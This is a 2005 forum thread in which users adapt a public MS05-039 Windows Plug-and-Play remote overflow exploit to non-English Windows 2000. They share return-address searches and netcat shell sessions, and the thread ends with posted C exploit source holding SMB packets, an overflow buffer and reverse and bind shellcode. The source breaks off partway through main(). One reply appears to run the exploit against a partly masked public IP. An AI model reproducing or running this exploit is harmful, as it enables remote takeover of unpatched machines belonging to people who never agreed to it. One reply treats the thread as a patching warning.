Articles
|
|
pita
Aug 16 2005, 08:45 AM
Like some of you, the exploits published the last week were not working on my windows 2k server with french language so i thought we need to make some modification on the exploit code... Let's take the code of the houseofdabus exploit, as you can see in the code CODE
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */
ok so the ret he used was 0x767a1567 in umpnpmgr.dll but on my windows 2k i see with the sac.exe utility (http://rapidshare.de/files/4030656/sac.zip.html) sac.exe -r XPRET -d umpnpmgr.dll (XPRET in sac utility is for pop pop retn) CODE
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x76741567 pop reg, pop reg, ret
0x76743827 pop reg, pop reg, ret
0x767438F6 pop reg, pop reg, ret
Search end.
Found 3 addr.
so the ret for my windows 2k french isn't the same... not so universal :/ so i thought the hole is in services.exe so maybe we could use a pop pop retn in services.exe sac.exe -r XPRET -d services.exe CODE
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x10030CB pop reg, pop reg, ret
0x10037D6 pop reg, pop reg, ret
0x100B112 pop reg, pop reg, ret
0x100DD5B pop reg, pop reg, ret
0x100E2C5 pop reg, pop reg, ret
0x100E2F8 pop reg, pop reg, ret
0x1013761 pop reg, pop reg, ret
0x1013C79 pop reg, pop reg, ret
Search end.
Found 8 addr.
yeah it smells good, lets see on a windows 2k with english language... sac.exe blahblahblah and yes we found it! CODE
0x1013C79 pop reg, pop reg, ret
so now let's modify the code in place of CODE
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */
i put CODE
/* pop reg; pop reg; retn; - services.exe */
"\x79\x3C\x01\x01" /* 0x1013C79 */
Compile it..., let's see if the exploit work on my windows 2k french language: CODE
C:\>pnp 192.168.0.218 1060
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus :.
[*] connecting to 192.168.0.218:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.218:1060
c:\>nc 192.168.0.218 1060
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>oops...
so here we are, we have now a working exploit over (i hope but not tested) all language. 
MpR
Aug 16 2005, 09:58 AM
Well as per any first reply Ive seen tonight strolling through this fine forum .. How Do i ...??? Where Can I ...... ???? Whats Does .....??? Google what ...??? Give me This . Give me That ... No seriously now Thanks alot for sharing what yah found man  I was actually playing with a Chinese copy trying to see what I could do but man try reading that when youre not use to it lol.. After a few more pots of coffee tonight and some more sleep deprivation I may have to experiment with your theory of things Best Of Luck
nolimit
Aug 16 2005, 10:20 AM
Well done. I forget, this is still usable in XP/2k3 with an established share right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OS's, it's not uncommon for them to shift
Pir
Aug 16 2005, 11:57 AM
very nice pita! works.
Tested on german version.
Just a question. What to replace on the first exploit??
//Edit
Friend tested on russian version.
[*] connecting to 192.168.0.5:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.5:6666
^C
C:\>nc 192.168.0.5 6666
Microsoft Windows 2000 [éÑÓß¿´ 5.00.2195]
(æ) è«Ó»«Óᵿ´ îᮬӫ߫õÔ, 1985-2000.
C:\WINNT\system32>
EviL
Aug 16 2005, 01:37 PM
QUOTE(pita @ Aug 16 2005, 08:45 AM) Like some of you, the exploits published the last week were not working on my windows 2k server with french language so i thought we need to make some modification on the exploit code... Let's take the code of the houseofdabus exploit, as you can see in the code CODE
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */
ok so the ret he used was 0x767a1567 in umpnpmgr.dll but on my windows 2k i see with the sac.exe utility (http://rapidshare.de/files/4030656/sac.zip.html) sac.exe -r XPRET -d umpnpmgr.dll (XPRET in sac utility is for pop pop retn) CODE
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x76741567 pop reg, pop reg, ret
0x76743827 pop reg, pop reg, ret
0x767438F6 pop reg, pop reg, ret
Search end.
Found 3 addr.
so the ret for my windows 2k french isn't the same... not so universal :/ so i thought the hole is in services.exe so maybe we could use a pop pop retn in services.exe sac.exe -r XPRET -d services.exe CODE
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x10030CB pop reg, pop reg, ret
0x10037D6 pop reg, pop reg, ret
0x100B112 pop reg, pop reg, ret
0x100DD5B pop reg, pop reg, ret
0x100E2C5 pop reg, pop reg, ret
0x100E2F8 pop reg, pop reg, ret
0x1013761 pop reg, pop reg, ret
0x1013C79 pop reg, pop reg, ret
Search end.
Found 8 addr.
yeah it smells good, lets see on a windows 2k with english language... sac.exe blahblahblah and yes we found it! CODE
0x1013C79 pop reg, pop reg, ret
so now let's modify the code in place of CODE
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */
i put CODE
/* pop reg; pop reg; retn; - services.exe */
"\x79\x3C\x01\x01" /* 0x1013C79 */
Compile it..., let's see if the exploit work on my windows 2k french language: CODE
C:\>pnp 192.168.0.218 1060
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus :.
[*] connecting to 192.168.0.218:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.218:1060
c:\>nc 192.168.0.218 1060
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>oops...
so here we are, we have now a working exploit over (i hope but not tested) all language. nice work pita  i've tried with .ru .de .it and it works
Killaloop
Aug 16 2005, 01:40 PM
QUOTE(nolimit @ Aug 16 2005, 10:20 AM) Well done. I forget, this is still usable in XP/2k3 with an established share right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OS's, it's not uncommon for them to shift this exploit uses SEH which is registered on XPSP2/2K3, you would need to rewrite it that it overwrites the complete SEH register. and for Win2k3 you would not only be authenticated, but also with an administrator account, which makes this quite useless
stay
Aug 16 2005, 02:31 PM
when you want to test an exploit on different language versions of windows, do you need each time the "real" version of the specified language/country or is it enough to install the MUI (and chagen to the specified language)?
on the one hand i can't imagine that microsoft translates the different version by changing hardcoded stuff, on the other , after my understanding using a language file wouldn't change anything on the code itself, however those adresses are memory addresses (correct me if i wrong...), therefore different language=different string would change memory and therefore MUI should be enough?
Rafter
Aug 16 2005, 03:25 PM
As a matter of info, these are the results of the sac command line with different systems I have access to on my LAN: Windows 2K SP4 Pro - Germansac - services.exeCODE D:\>sac -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x1008336 pop reg, pop reg, ret
0x1008B11 pop reg, pop reg, ret
0x100A7FE pop reg, pop reg, ret
0x100EECA pop reg, pop reg, ret
0x1010A21 pop reg, pop reg, ret
0x1010ED3 pop reg, pop reg, ret
0x1010F0D pop reg, pop reg, ret
0x1014D4E pop reg, pop reg, ret
Search end.
Found 8 addr.
sac - umpnpmgr.dllCODE D:\>sac -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x76736A3D pop reg, pop reg, ret
0x76738D38 pop reg, pop reg, ret
0x76739282 pop reg, pop reg, ret
Search end.
Found 3 addr.
Windows 2K SP4 Server - Englishsac - services.exeCODE D:\>sac.exe -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x10030CB pop reg, pop reg, ret
0x10037D6 pop reg, pop reg, ret
0x100B112 pop reg, pop reg, ret
0x100DD5B pop reg, pop reg, ret
0x100E2C5 pop reg, pop reg, ret
0x100E2F8 pop reg, pop reg, ret
0x1013761 pop reg, pop reg, ret
0x1013C79 pop reg, pop reg, ret
Search end.
Found 8 addr.
sac - umpnpmgr.dllCODE D:\>sac.exe -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x767A1567 pop reg, pop reg, ret
0x767A3827 pop reg, pop reg, ret
0x767A38F6 pop reg, pop reg, ret
Search end.
Found 3 addr.
Windows XP SP2 Pro - Germansac - services.exeCODE D:\Temp\sac>sac.exe -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x100A919 pop reg, pop reg, ret
0x100B387 pop reg, pop reg, ret
0x100C721 pop reg, pop reg, ret
0x100C79A pop reg, pop reg, ret
0x100F841 pop reg, pop reg, ret
Search end.
Found 5 addr.
sac - umpnpmgr.dllCODE D:\Temp\sac>sac -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x7585E552 pop reg, pop reg, ret
Search end.
Found 1 addr.
Windows 2K3 SP1 - Englishsac - services.exeCODE C:\>sac -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x1006FC3 pop reg, pop reg, ret
0x10070E0 pop reg, pop reg, ret
0x100734A pop reg, pop reg, ret
0x10085BA pop reg, pop reg, ret
0x1008631 pop reg, pop reg, ret
0x100F43E pop reg, pop reg, ret
0x10123B6 pop reg, pop reg, ret
0x10124EA pop reg, pop reg, ret
0x1012522 pop reg, pop reg, ret
Search end.
Found 9 addr.
sac - umpnpmgr.dllCODE C:\>sac -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x75773DEA pop reg, pop reg, ret
0x7577EFD9 pop reg, pop reg, ret
Search end.
Found 2 addr.
MxMx
Aug 16 2005, 03:39 PM
yess really uber great tested on several win2k machines with other langs and it worked perfectly 
soundsearch
Aug 16 2005, 04:05 PM
Wich code should i paste for Dutch Os ?
MAn i alwayssss get This With all windows exploits :S .
C:\>lol 213.23.***.89 1060
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
Universal Exploit + no crash shellcode
Copyright © 2005 .: houseofdabus :.
[*] connecting to 213.23.***.89:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 213.23.***.89:1060
C:\>nc 213.23.***.89 1060
C:\>
Yorn
Aug 16 2005, 05:42 PM
Very informative pita. Thanks for taking the time to look into this. I'm sure someone else has been, so in the interests of full-disclosure, it's good to know that more than just English versions are affected.
This should serve as fair warning to the rest of us network admins to get our laptops and etc updated ASAP. I know I have been looking into getting the stations I support patched quickly.
majestic
Aug 17 2005, 12:26 AM
It works great pita, great job.
I just wanted to ask, this exploit affects just WIN2K Pro? or it affects every WIN2K?
pita
Aug 17 2005, 09:59 AM
QUOTE(majestic @ Aug 17 2005, 12:26 AM) It works great pita, great job. I just wanted to ask, this exploit affects just WIN2K Pro? or it affects every WIN2K? as say in the advisorie http://secunia.com/advisories/16372/OS: Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Professional Microsoft Windows 2000 Server
pita
Aug 17 2005, 09:58 AM
QUOTE(majestic @ Aug 17 2005, 12:26 AM) I just wanted to ask, this exploit affects just WIN2K Pro? or it affects every WIN2K? as say in the advisorie http://secunia.com/advisories/16372/OS: Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Professional Microsoft Windows 2000 Server
rpm
Aug 17 2005, 10:20 AM
Anyone found a way to add multiple targets in?
pita
Aug 17 2005, 10:24 AM
i was bored this morning so i thought why not make the like easier and this is the houseofdabus exploit modified with the 0x1013C79 ret and a reverse shellcode added. CODE
/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit (0x01013C79) + reverse and bind shellcode
*
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerability.
*
* On Windows XP Service Pack 1, only an authenticated user could
* remotely try to exploit this vulnerability.
* On Window XP Service Pack 2 and Windows Server 2003, only an
* administrator can remotely access the affected component.
* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
* this is strictly a local privilege elevation vulnerability.
* An anonymous user cannot remotely attempt to exploit this
* vulnerability on Windows XP Service Pack 2 and Windows
* Server 2003.
*
* ---------------------------------------------------------------------
* Solution:
* http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
*
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows Server 2003, SP1
* - Windows XP SP1, SP2
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
*
* [*] connecting to 192.168.0.22:445...ok
* [*] null session...ok
* [*] bind pipe...ok
* [*] sending crafted packet...ok
* [*] check your shell on 192.168.0.1:7777
* Ctrl+C
*
* C:\>nc 192.168.0.1 7777
*
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
unsigned char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";
unsigned char SMB_SessionSetupAndX[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";
unsigned char SMB_SessionSetupAndX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
unsigned char SMB_TreeConnectAndX[] =
"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";
unsigned char SMB_TreeConnectAndX_[] =
"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";
/* browser */
unsigned char SMB_PipeRequest_browser[] =
"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
unsigned char RPC_call[] =
"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
/* jmp over - entry point */
"\xEB\x08\x90\x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x79\x3C\x01\x01" /* 0x1013C79 pop reg, pop reg, ret*/
/* jmp ebx - umpnpmgr.dll
"\x6f\x36\x7a\x76" */
"\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char RPC_call_end[] =
"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";
unsigned char reverse_shellcode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";
unsigned char bind_shellcode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";
#define SET_PORTBIND_PORT(buf, port) \
*(unsigned short *)(((buf)+186)) = (port)
void
convert_name(char *out, char *name)
{
unsigned long len;
len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = '\x00';
*out-- = name[len];
}
}
int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned long ip;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
printf("\t Universal Exploit (0x01013C79) + reverse and bind shellcode\n\n\n");
